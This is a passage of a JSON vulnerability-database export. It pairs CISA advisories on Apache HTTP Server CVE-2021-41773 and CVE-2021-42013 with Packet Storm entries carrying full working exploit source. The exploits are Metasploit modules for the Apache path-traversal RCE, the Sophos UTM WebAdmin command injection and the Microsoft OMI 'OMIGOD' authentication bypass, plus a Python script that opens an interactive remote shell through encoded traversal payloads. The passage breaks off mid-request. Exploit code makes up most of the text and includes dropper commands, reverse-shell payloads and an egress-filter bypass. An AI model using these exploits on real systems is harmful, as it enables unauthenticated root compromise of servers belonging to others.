vulnerabilities page](<https://httpd.apache.org/>) and apply the necessary update.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/10/06/apache-releases-security-update-apache-http-server>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-06T00:00:00", "type": "cisa", "title": "Apache Releases Security Update for Apache HTTP Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-07T00:00:00", "id": "CISA:78B08801DAA7C3B8A2D34A5790730C76", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/10/06/apache-releases-security-update-apache-http-server", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:26:07", "description": "On October 7, 2021, the Apache Software Foundation released [Apache HTTP Server version 2.4.51](<https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2021-42013>) to address Path Traversal and Remote Code Execution vulnerabilities (CVE-2021-41773, CVE-2021-42013) in Apache HTTP Server 2.4.49 and 2.4.50. These vulnerabilities have been exploited in the wild. \n\nCISA is also seeing ongoing scanning of vulnerable systems, which is expected to accelerate, likely leading to exploitation. CISA urges organizations to [patch](<https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2021-42013>) immediately if they haven\u2019t already\u2014this cannot wait until after the holiday weekend.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/10/07/apache-releases-http-server-version-2451-address-vulnerabilities>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-07T00:00:00", "type": "cisa", "title": "Apache Releases HTTP Server version 2.4.51 to Address Vulnerabilities Under Exploitation ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-07T00:00:00", "id": "CISA:76FE595B1B89D06301E16CB8087D39BD", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/10/07/apache-releases-http-server-version-2451-address-vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-10-25T17:32:29", "description": "", "cvss3": {}, "published": "2021-10-25T00:00:00", "type": "packetstorm", "title": "Apache 2.4.49 / 2.4.50 Traversal / Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-25T00:00:00", "id": "PACKETSTORM:164629", "href": "https://packetstormsecurity.com/files/164629/Apache-2.4.49-2.4.50-Traversal-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \ninclude Msf::Exploit::Remote::CheckModule \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Apache 2.4.49/2.4.50 Traversal RCE', \n'Description' => %q{ \nThis module exploit an unauthenticated RCE vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773). \nIf files outside of the document root are not protected by \u2018require all denied\u2019 and CGI has been explicitly enabled, \nit can be used to execute arbitrary commands (Remote Command Execution). \nThis vulnerability has been reintroduced in Apache 2.4.50 fix (CVE-2021-42013). \n}, \n'References' => [ \n['CVE', '2021-41773'], \n['CVE', '2021-42013'], \n['URL', 'https://httpd.apache.org/security/vulnerabilities_24.html'], \n['URL', 'https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse'], \n['URL', 'https://github.com/projectdiscovery/nuclei-templates/blob/master/vulnerabilities/apache/apache-httpd-rce.yaml'], \n['URL', 'https://github.com/projectdiscovery/nuclei-templates/commit/9384dd235ec5107f423d930ac80055f2ce2bff74'], \n['URL', 'https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis'] \n], \n'Author' => [ \n'Ash Daulton', # Vulnerability discovery \n'Dhiraj Mishra', # Metasploit auxiliary module \n'mekhalleh (RAMELLA S\u00e9bastien)' # Metasploit exploit module (Zeop Entreprise) \n], \n'DisclosureDate' => '2021-05-10', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86], \n'DefaultOptions' => { \n'CheckModule' => 'auxiliary/scanner/http/apache_normalize_path', \n'Action' => 'CHECK_RCE', \n'RPORT' => 443, \n'SSL' => true \n}, \n'Targets' => [ \n[ \n'Automatic (Dropper)', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X64, ARCH_X86], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', \n'DisablePayloadHandler' => 'false' \n} \n} \n], \n[ \n'Unix Command (In-Memory)', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_command, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/generic', \n'DisablePayloadHandler' => 'true' \n} \n} \n], \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2021-42013', ['CVE-2021-41773', 'CVE-2021-42013']]), \nOptInt.new('DEPTH', [true, 'Depth for Path Traversal', 5]), \nOptString.new('TARGETURI', [true, 'Base path', '/cgi-bin']) \n]) \nend \n \ndef cmd_unix_generic? \ndatastore['PAYLOAD'] == 'cmd/unix/generic' \nend \n \ndef execute_command(command, _opts = {}) \ntraversal = pick_payload * datastore['DEPTH'] << '/bin/sh' \n \nuri = normalize_uri(datastore['TARGETURI'], traversal.to_s) \nresponse = send_request_raw({ \n'method' => Rex::Text.rand_text_alpha(3..4), \n'uri' => uri, \n'data' => \"#{Rex::Text.rand_text_alpha(1..3)}=|echo;#{command}\" \n}) \nif response && response.body \nreturn response.body \nend \n \nfalse \nend \n \ndef message(msg) \n\"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\" \nend \n \ndef pick_payload \ncase datastore['CVE'] \nwhen 'CVE-2021-41773' \npayload = '.%2e/' \nwhen 'CVE-2021-42013' \npayload = '.%%32%65/' \nelse \npayload = '' \nend \n \npayload \nend \n \ndef exploit \n@proto = (ssl ? 'https' : 'http') \n \nif (!check.eql? Exploit::CheckCode::Vulnerable) && !datastore['ForceExploit'] \nfail_with(Failure::NotVulnerable, 'The target is not exploitable.') \nend \n \nprint_status(message(\"Attempt to exploit for #{datastore['CVE']}\")) \ncase target['Type'] \nwhen :linux_dropper \n \nfile_name = \"/tmp/#{Rex::Text.rand_text_alpha(4..8)}\" \ncmd = \"echo #{Rex::Text.encode_base64(generate_payload_exe)} | base64 -d > #{file_name}; chmod +x #{file_name}; #{file_name}; rm -f #{file_name}\" \n \nprint_status(message(\"Sending #{datastore['PAYLOAD']} command payload\")) \nvprint_status(message(\"Generated command payload: #{cmd}\")) \n \nexecute_command(cmd) \n \nregister_file_for_cleanup file_name \nwhen :unix_command \nvprint_status(message(\"Generated payload: #{payload.encoded}\")) \n \nif !cmd_unix_generic? \nexecute_command(payload.encoded) \nelse \nreceived = execute_command(payload.encoded.to_s) \n \nprint_warning(message('Dumping command output in response')) \nif !received \nprint_error(message('Empty response, no command output')) \n \nreturn \nend \nprint_line(received) \nend \nend \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/164629/apache_normalize_path_rce.rb.txt"}, {"lastseen": "2021-11-11T17:16:30", "description": "", "cvss3": {}, "published": "2021-11-11T00:00:00", "type": "packetstorm", "title": "Apache HTTP Server 2.4.50 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-11-11T00:00:00", "id": "PACKETSTORM:164941", "href": "https://packetstormsecurity.com/files/164941/Apache-HTTP-Server-2.4.50-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3) \n# Date: 11/11/2021 \n# Exploit Author: Valentin Lobstein \n# Vendor Homepage: https://apache.org/ \n# Software Link: https://github.com/Balgogan/CVE-2021-41773 \n# Version: Apache 2.4.49/2.4.50 (CGI enabled) \n# Tested on: Debian GNU/Linux \n# CVE : CVE-2021-41773 / CVE-2021-42013 \n# Credits : Lucas Schnell \n \n \n#!/usr/bin/env python3 \n#coding: utf-8 \n \nimport os \nimport re \nimport sys \nimport time \nimport requests \nfrom colorama import Fore,Style \n \n \nheader = '''\\033[1;91m \n \n\u2584\u2584\u2584 \u2588\u2588\u2593\u2588\u2588\u2588 \u2584\u2584\u2584 \u2584\u2588\u2588\u2588\u2588\u2584 \u2588\u2588\u2591 \u2588\u2588 \u2593\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2580\u2588\u2588\u2588 \u2584\u2588\u2588\u2588\u2588\u2584 \u2593\u2588\u2588\u2588\u2588\u2588 \n\u2592\u2588\u2588\u2588\u2588\u2584 \u2593\u2588\u2588\u2591 \u2588\u2588\u2592\u2592\u2588\u2588\u2588\u2588\u2584 \u2592\u2588\u2588\u2580 \u2580\u2588 \u2593\u2588\u2588\u2591 \u2588\u2588\u2592\u2593\u2588 \u2580 \u2593\u2588\u2588 \u2592 \u2588\u2588\u2592\u2592\u2588\u2588\u2580 \u2580\u2588 \u2593\u2588 \u2580 \n\u2592\u2588\u2588 \u2580\u2588\u2584 \u2593\u2588\u2588\u2591 \u2588\u2588\u2593\u2592\u2592\u2588\u2588 \u2580\u2588\u2584 \u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2580\u2580\u2588\u2588\u2591\u2592\u2588\u2588\u2588 \u2593\u2588\u2588 \u2591\u2584\u2588 \u2592\u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2588 \n\u2591\u2588\u2588\u2584\u2584\u2584\u2584\u2588\u2588 \u2592\u2588\u2588\u2584\u2588\u2593\u2592 \u2592\u2591\u2588\u2588\u2584\u2584\u2584\u2584\u2588\u2588 \u2592\u2593\u2593\u2584 \u2584\u2588\u2588\u2592\u2591\u2593\u2588 \u2591\u2588\u2588 \u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2580\u2580\u2588\u2584 \u2592\u2593\u2593\u2584 \u2584\u2588\u2588\u2592\u2592\u2593\u2588 \u2584 \n\u2593\u2588 \u2593\u2588\u2588\u2592\u2592\u2588\u2588\u2592 \u2591 \u2591 \u2593\u2588 \u2593\u2588\u2588\u2592\u2592 \u2593\u2588\u2588\u2588\u2580 \u2591\u2591\u2593\u2588\u2592\u2591\u2588\u2588\u2593\u2591\u2592\u2588\u2588\u2588\u2588\u2592 \u2591\u2588\u2588\u2593 \u2592\u2588\u2588\u2592\u2592 \u2593\u2588\u2588\u2588\u2580 \u2591\u2591\u2592\u2588\u2588\u2588\u2588\u2592 \n\u2592\u2592 \u2593\u2592\u2588\u2591\u2592\u2593\u2592\u2591 \u2591 \u2591 \u2592\u2592 \u2593\u2592\u2588\u2591\u2591 \u2591\u2592 \u2592 \u2591 \u2592 \u2591\u2591\u2592\u2591\u2592\u2591\u2591 \u2592\u2591 \u2591 \u2591 \u2592\u2593 \u2591\u2592\u2593\u2591\u2591 \u2591\u2592 \u2592 \u2591\u2591\u2591 \u2592\u2591 \u2591 \n\u2592 \u2592\u2592 \u2591\u2591\u2592 \u2591 \u2592 \u2592\u2592 \u2591 \u2591 \u2592 \u2592 \u2591\u2592\u2591 \u2591 \u2591 \u2591 \u2591 \u2591\u2592 \u2591 \u2592\u2591 \u2591 \u2592 \u2591 \u2591 \u2591 \n\u2591 \u2592 \u2591\u2591 \u2591 \u2592 \u2591 \u2591 \u2591\u2591 \u2591 \u2591 \u2591\u2591 \u2591 \u2591 \u2591 \n''' + Style.RESET_ALL \n \n \nif len(sys.argv) < 2 : \nprint( 'Use: python3 file.py ip:port ' ) \nsys.exit() \n \ndef end(): \nprint(\"\\t\\033[1;91m[!] Bye bye !\") \ntime.sleep(0.5) \nsys.exit(1) \n \ndef commands(url,command,session): \ndirectory = mute_command(url,'pwd') \nuser = mute_command(url,'whoami') \nhostname = mute_command(url,'hostname') \nadvise = print(Fore.YELLOW + 'Reverse shell is advised (This isn\\'t an interactive shell)') \ncommand = input(f\"{Fore.RED}\u256d\u2500{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\\n{Fore.RED}\u2570\u2500{Fore.YELLOW}$ {Style.RESET_ALL}\") \ncommand = f\"echo; {command};\" \nreq = requests.Request('POST', url=url, data=command) \nprepare = req.prepare() \nprepare.url = url \nresponse = session.send(prepare, timeout=5) \noutput = response.text \nprint(output) \nif 'clear' in command: \nos.system('/usr/bin/clear') \nprint(header) \nif 'exit' in command: \nend() \n \ndef mute_command(url,command): \nsession = requests.Session() \nreq = requests.Request('POST', url=url, data=f\"echo; {command}\") \nprepare = req.prepare() \nprepare.url = url \nresponse = session.send(prepare, timeout=5) \nreturn response.text.strip() \n \n \ndef exploitRCE(payload): \ns = requests.Session() \ntry: \nhost = sys.argv[1] \nif 'http' not in host: \nurl = 'http://'+ host + payload \nelse: \nurl = host + payload \nsession = requests.Session() \ncommand = \"echo; id\" \nreq = requests.Request('POST', url=url, data=command) \nprepare = req.prepare() \nprepare.url = url \nresponse = session.send(prepare, timeout=5) \noutput = response.text \nif \"uid\" in output: \nchoice = \"Y\" \nprint( Fore.GREEN + '\\n[!] Target %s is vulnerable !!!' % host) \nprint(\"[!] Sortie:\\n\\n\" + Fore.YELLOW + output ) \nchoice = input(Fore.CYAN + \"[?] Do you want to exploit this RCE ? (Y/n) : \") \nif choice.lower() in ['','y','yes']: \nwhile True: \ncommands(url,command,session) \nelse: \nend() \nelse : \nprint(Fore.RED + '\\nTarget %s isn\\'t vulnerable' % host) \nexcept KeyboardInterrupt: \nend() \n \ndef main(): \ntry: \napache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash' \napache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash' \npayloads = [apache2449_payload,apache2450_payload] \nchoice = len(payloads) + 1 \nprint(header) \nprint(\"\\033[1;37m[0] Apache 2.4.49 RCE\\n[1] Apache 2.4.50 RCE\") \nwhile choice >= len(payloads) and choice >= 0: \nchoice = int(input('[~] Choice : ')) \nif choice < len(payloads): \nexploitRCE(payloads[choice]) \nexcept KeyboardInterrupt: \nprint(\"\\n\\033[1;91m[!] Bye bye !\") \ntime.sleep(0.5) \nsys.exit(1) \n \nif __name__ == '__main__': \nmain() \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/164941/apachehttp2450-exec.txt"}, {"lastseen": "2021-10-28T15:40:59", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-28T00:00:00", "type": "packetstorm", "title": "Sophos UTM WebAdmin SID Command Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25223"], "modified": "2021-10-28T00:00:00", "id": "PACKETSTORM:164697", "href": "https://packetstormsecurity.com/files/164697/Sophos-UTM-WebAdmin-SID-Command-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Sophos UTM WebAdmin SID Command Injection', \n'Description' => %q{ \nThis module exploits an SID-based command injection in Sophos UTM's \nWebAdmin interface to execute shell commands as the root user. \n}, \n'Author' => [ \n# Discovered by unknown researcher(s) \n'Justin Kennedy', # Analysis and PoC \n'wvu' # Supplementary analysis and exploit \n], \n'References' => [ \n['CVE', '2020-25223'], \n['URL', 'https://www.sophos.com/en-us/security-advisories/sophos-sa-20200918-sg-webadmin-rce'], \n['URL', 'https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223'], \n['URL', 'https://attackerkb.com/assessments/d6e0dff3-dd46-4f19-831d-c3f3f2fa972a'] \n], \n'DisclosureDate' => '2020-09-18', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_perl_ssl' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 4444, \n'LPORT' => 443, # XXX: Bypass Sophos UTM's egress filtering \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [FIRST_ATTEMPT_FAIL], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef stopwatch \n# https://blog.dnsimple.com/2018/03/elapsed-time-with-ruby-the-right-way/ \nstart = Process.clock_gettime(Process::CLOCK_MONOTONIC) \nret = yield \nelapsed = Process.clock_gettime(Process::CLOCK_MONOTONIC) - start \n \n[ret, elapsed] \nend \n \ndef check \nsleep_time = rand(5..10) \n \ninjected, elapsed_time = stopwatch do \ninject_cmd(\"sleep #{sleep_time}\", timeout: sleep_time * 1.5) \nend \n \nreturn CheckCode::Unknown if injected.nil? \n \nvprint_status(\"Elapsed time: #{elapsed_time} seconds\") \n \n# injected == false \nunless injected && elapsed_time > sleep_time \nreturn CheckCode::Safe('Failed to test command injection.') \nend \n \n# injected == true \nCheckCode::Appears('Successfully tested command injection.') \nend \n \ndef exploit \nunless datastore['LPORT'] == 443 \nprint_warning('LPORT=443 is recommended to bypass egress filtering') \nend \n \nprint_status(\"Executing #{payload_instance.refname} (#{target.name})\") \n \ncase target['Type'] \nwhen :cmd \nexecute_command(payload.encoded) \nwhen :dropper \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, _opts = {}) \n# nil or true on success \nif inject_cmd(cmd) == false \nfail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\") \nend \nend \n \ndef inject_cmd(cmd, timeout: 3.5) \nvprint_status(\"Injecting command: #{cmd}\") \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, 'var'), \n'ctype' => 'application/json; charset=UTF-8', # NOTE: charset is required \n'data' => { \n'SID' => \"|#{cmd}|\" # https://perldoc.perl.org/functions/open#Opening-a-filehandle-into-a-command \n}.to_json \n}, timeout) \n \nreturn unless res \nreturn false unless res.code == 200 && res.body.include?(alert_msg) \n \ntrue \nend \n \ndef alert_msg \n# {\"RID\":\"\",\"objs\":[{\"js\":\"json_abort(true);\"},{\"alert\":\"Backend connection failed, please click Shift-Reload to try again.\"}]} \n'Backend connection failed, please click Shift-Reload to try again.' \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/164697/sophos_utm_webadmin_sid_cmd_injection.rb.txt"}, {"lastseen": "2021-10-28T15:41:03", "description": "", "cvss3": {}, "published": "2021-10-28T00:00:00", "type": "packetstorm", "title": "Microsoft OMI Management Interface Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-38647"], "modified": "2021-10-28T00:00:00", "id": "PACKETSTORM:164694", "href": "https://packetstormsecurity.com/files/164694/Microsoft-OMI-Management-Interface-Authentication-Bypass.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \nXML_NS = { 'p' => 'http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem' }.freeze \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft OMI Management Interface Authentication Bypass', \n'Description' => %q{ \nBy removing the authentication header, an attacker can issue an HTTP request to the OMI management endpoint \nthat will cause it to execute an operating system command as the root user. This vulnerability was patched in \nOMI version 1.6.8-1 (released September 8th 2021). \n}, \n'Author' => [ \n'Nir Ohfeld', # vulnerability discovery & research \n'Shir Tamari', # vulnerability discovery & research \n'Spencer McIntyre', # metasploit module \n'wvu' # vulnerability research \n], \n'References' => [ \n['CVE', '2021-38647'], \n['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647'], \n['URL', 'https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure'], \n['URL', 'https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/'], \n['URL', 'https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647'] \n], \n'DisclosureDate' => '2021-09-14', \n'License' => MSF_LICENSE, \n'Platform' => ['linux', 'unix'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper \n} \n] \n], \n'DefaultTarget' => 1, \n'DefaultOptions' => { \n'RPORT' => 5985, \n'SSL' => false, \n'MeterpreterTryToFork' => true \n}, \n'Notes' => { \n'AKA' => ['OMIGOD'], \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/wsman']) \n]) \nend \n \ndef check \nhttp_res = send_command('id') \nreturn CheckCode::Unknown if http_res.nil? \nreturn CheckCode::Safe unless http_res.code == 200 \n \ncmd_res = parse_response(http_res) \nreturn CheckCode::Unknown if cmd_res.nil? || cmd_res[:stdout] !~ /uid=(\\d+)\\(\\S+\\) / \n \nreturn CheckCode::Vulnerable(\"Command executed as uid #{Regexp.last_match(1)}.\") \nend \n \ndef exploit \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :unix_cmd \nresult = execute_command(payload.encoded) \nif result \nprint_status(result[:stdout]) unless result[:stdout].blank? \nprint_error(result[:stderr]) unless result[:stderr].blank? \nend \nwhen :linux_dropper \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nvprint_status(\"Executing command: #{cmd}\") \nres = send_command(cmd) \n \nunless res && res.code == 200 \nfail_with(Failure::UnexpectedReply, \"Failed to execute command: #{cmd}\") \nend \n \nparse_response(res) \nend \n \ndef parse_response(res) \nreturn nil unless res&.code == 200 \n \nreturn_code = res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:ReturnCode', XML_NS)&.content.to_i \nunless return_code == 0 \nprint_error(\"Failed to execute command: #{cmd} (status: #{return_code})\") \nend \n \n{ \nreturn_code: return_code, \nstdout: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdOut', XML_NS)&.content, \nstderr: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdErr', XML_NS)&.content \n} \nend \n \ndef send_command(cmd) \nsend_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path), \n'ctype' => 'text/xml;charset=UTF-8', \n'data' => Nokogiri::XML(<<-ENVELOPE, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0) \n<s:Envelope xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:a=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\" xmlns:n=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\" xmlns:w=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema\" xmlns:h=\"http://schemas.microsoft.com/wbem/wsman/1/windows/shell\" xmlns:p=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\"> \n<s:Header> \n<a:To>HTTP://127.0.0.1:5985/wsman/</a:To> \n<w:ResourceURI s:mustUnderstand=\"true\">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI> \n<a:ReplyTo> \n<a:Address s:mustUnderstand=\"true\">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address> \n</a:ReplyTo> \n<a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action> \n<w:MaxEnvelopeSize s:mustUnderstand=\"true\">102400</w:MaxEnvelopeSize> \n<a:MessageID>uuid:#{Faker::Internet.uuid}</a:MessageID> \n<w:OperationTimeout>PT1M30S</w:OperationTimeout> \n<w:Locale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/> \n<p:DataLocale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/> \n<w:OptionSet s:mustUnderstand=\"true\"/> \n<w:SelectorSet> \n<w:Selector Name=\"__cimnamespace\">root/scx</w:Selector> \n</w:SelectorSet> \n</s:Header> \n<s:Body> \n<p:ExecuteScript_INPUT 